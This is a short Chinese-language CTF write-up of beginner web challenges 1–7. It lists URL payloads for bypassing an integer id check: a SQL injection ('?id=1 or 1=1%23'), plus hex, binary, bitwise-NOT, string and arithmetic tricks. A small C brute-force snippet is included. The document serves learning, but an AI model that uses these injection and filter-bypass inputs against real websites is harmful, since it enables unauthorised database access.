萌新计划 web1-7总结
- web1
直接 ?id=1 or 1=1%23 - web2
直接 ?id=0x3e8 (16进制) - web3
直接 ?id='1000' (可以直接使用字符串绕过intval函数,而且数据库也可以查询) - web4
方法和web3一样 - web5
直接使用~运算符
?id=~~1000 - web6
方法和web5一样 - web7
直接使用二进制:
?id=0b1111101000
转换工具
总结 - 使用运算符+,-,,/
2504
1200-200
998+2(+转换成url编码%2b)
--1000 - 我们可以使用位运算符来进行操作
^,<<,>>,|,~等等
#include<stdio.h>
//by Firebasky
int main()
{
int i,j;
for(i=0;i<1000;i++)
{
for(j=0;j<1000;j++)
{
if((i>>j)==1000)#直接修改位运算符
{
printf("%d,%d\n",i,j);
break;
}
}
}
return 0;
}
- 使用进制转换
2进制开头0b
8进制开头0
16进制开头0x
转换工具 - 使用字符串绕过
单引号,双引号,括号等等
他们的坚强他们的梦
他们的苦只有自己懂

浙公网安备 33010602011771号